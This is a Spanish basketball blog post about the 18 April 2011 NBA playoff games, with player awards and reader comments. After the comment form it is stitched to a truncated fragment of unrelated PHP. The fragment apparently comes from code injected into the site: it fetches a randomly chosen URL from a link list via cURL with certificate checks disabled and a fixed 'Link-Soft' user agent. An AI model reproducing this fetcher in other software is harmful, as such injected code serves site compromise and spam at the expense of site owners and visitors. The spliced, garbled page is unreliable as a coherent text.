Playoffs (18/04/2011): Distinto camino, mismo destino.

19 de April de 2011 por TheDeerHunter

2-0 para los dos primeros cabezas de serie en el Este.

Los Bulls despiertan dudas sufriendo mucho más de lo esperado. Ayer se lesionaba Darren Collison apenas transcurrido un cuarto de hora (con un +6 a su favor) al pisar, desafortunadamente,  a uno de los fotógrafos de fondo. Ya hemos visto algún que otro incidente similar en lo que llevamos de postemporada y es hora de que alguien empiece a hacérselo mirar. El agujero que tiene que tapar Vogel en la dirección es de tres pares y la broma para los Pacers es casi definitiva. No son ni Price ni Ford piezas de garantías para la posición y Rose lo aprovechó para cebarse con total alegría y comodidad. Por si fuera poco, los Bulls les hicieron un daño terrible en el aspecto reboteador. 24 rebotes de diferencia que se dicen pronto. No era el día de la pareja Hibbert-Hansbrough. Con estos ingredientes lo normal es que el asunto se hubiera resuelto con un palizón de 30 o 40 puntos pero algo no cuadra y los Bulls no meten tanto miedo si tiran por debajo del 40% y pierden todos los balones del mundo. Quitando a Rose y a Boozer, más un único triple vital de Korver (porque si no es por ese triple estaríamos hablando de otra cosa hoy) el resto del equipo jugó bastante mal y sin nada del otro mundo, los Pacers estuvieron a un pelo de llevarse el gato al agua. Si Collison no vuelve pocas oportunidades van a tener mejores que la de anoche (90-96).

Por su parte, en Miami, Wade llegaba al pabellón mermado por la migraña, pero para dolor de cabeza el nivel de lanzamiento de los Sixers, simplemente estelar: Iguodala 2-8; Brand 1-5; Hawes 1-3; Meeks 2-6; Holiday 5-13; Williams 1-8; Speights 0-5… Los Sixers se hicieron el hara-kiri en el American Airlines Arena. Los únicos que funcionaron fueron Thaddeus y Evans. A los Heat sólo les hace falta que les den facilidades y se dedicaron a coser a sus rivales a contragolpe vivo. Tras este resultado y esta actuación el equipo de Doug Collins queda muy tocado (73-94).

PREMIOS

MVP: Los Bulls siguen ofreciendo dudas pero Derrick Rose sigue mandando. Anoche fueron 36 puntos, 8 rebotes y 6 asistencias. Debería controlar las pérdidas de balón (9 en 2 partidos) para cuajar partidos de 10. En Miami, Lebron James no perdonó los regalos de los Sixers y se fue a los 29 puntos, 7 rebotes y 6 asistencias.

Sorpresa: Evan Turner fue anoche el mejor de los Sixers. Sus 15 puntos y 6 rebotes destacan entre la mediocridad de los números de sus compañeros.

Decepción: Mal día para los Sixers personalizado en Elton Brand. 5 puntos y un 1 de 5 en tiros en 30 minutos de juego.

Esfuerzo en vano: Danny Granger fue el estilete de los Pacers pero sus 19 puntos, 4 asistencias y 3 robos no fueron suficientes para imponerse a los Bulls.

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Y Adelman no renueva con los Rockets. Se habla de Lakers (como de todo técnico que esté libre)

    A mí me queda un cierto saborcillo agridulce de proyecto inconcluso…

      Citar

  2. Antoine Doinel dice:
    #2

    Bueno, si en dos partidos malos de Heat y Bulls, ni Pacers ni Sixers les han conseguido sacar una sola victoria, parece claro que las series están decididas. Veo a Miami y/o Chicago ganando al menos 1 fuera, con lo cual ya huelen a semifinales.
    No creo que los Heat lleguen muy lejos. Vale, sí, tienen el big 3 y en playoff son decisivos, pero, en el día que uno de ellos esté bien defendido y otro no esté acertado en el tiro, lo tienen mal para ganar, y no es tan raro que esto pase. Sudarán y mucho contra Celtics o Knicks.

      Citar

  3. Ru dice:
    #3

    Pues si,Miami camino del 4-0.Aún con una versión al 50% de Wade menuda paliza les han metido a los Sixers y es que con semejante actuación del quinteto poco se puede hacer….No sé si la rotación de Doug Collins a lo largo de la regular ha sido como en este partido de PO,pero es que Turner ha jugado de 1,2,3 y de 4 (¿¡¡!!?) con Bosh y Anthony en pista,anotando en ataque de forma fluida,dirigiendo al equipo y encima exigido en defensa emparejándose con Wade -que le hace rotos a cualquiera- y con LeBron,que hizo sufrir al de Ohio State de lo lindo y es que por cuerpo se lo come.A ver si este verano el bueno de Evan trabaja en el gimnasio y recupera confianza porque después de todas las críticas de esta temporada el chaval demuestra que vale.¡Más minutos para Turner!

      Citar

  4. TX dice:
    #4

    Y Chocolate Blanco finalmente se retira. Como me gustaba este jugadorazo… Mas como el tenia que haber por el bien del espectaculo

      Citar

  5. JHC dice:
    #5

    Randolph renueva con Mephis definitivamente por 4 temporadas y algo más de 70 millones la última es una opcion de jugador…x cierto algun sitio para ver el partido en diferido Hawks – Orlando?

      Citar

  6. Txusma dice:
    #6

    De los 70 kilos, 66 son garantizados… A mi me parece una pasada de contrato y con el historial de Zach (sospechoso habitual hasta el día que muera) me da que se lo van a comer.

      Citar

  7. the wolf dice:
    #7

    JHC…yo los partidos los descargo en el foro de rojadirecta en la seccion “partidos en descarga”…estan a buena calidad, no tardan mucho en bajarse y suelen estar una o dos horas despues del partido y si esperas algo mas incluso con los comentarios de canal +

      Citar

  8. the wolf dice:
    #8

    JHC…yo los partidos los descargo en el foro de rojadirecta en la seccion “partidos en descarga”…estan a buena calidad, no tardan mucho en bajarse y suelen estar una o dos horas despues del partido y si esperas algo mas incluso con los comentarios de canal +

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>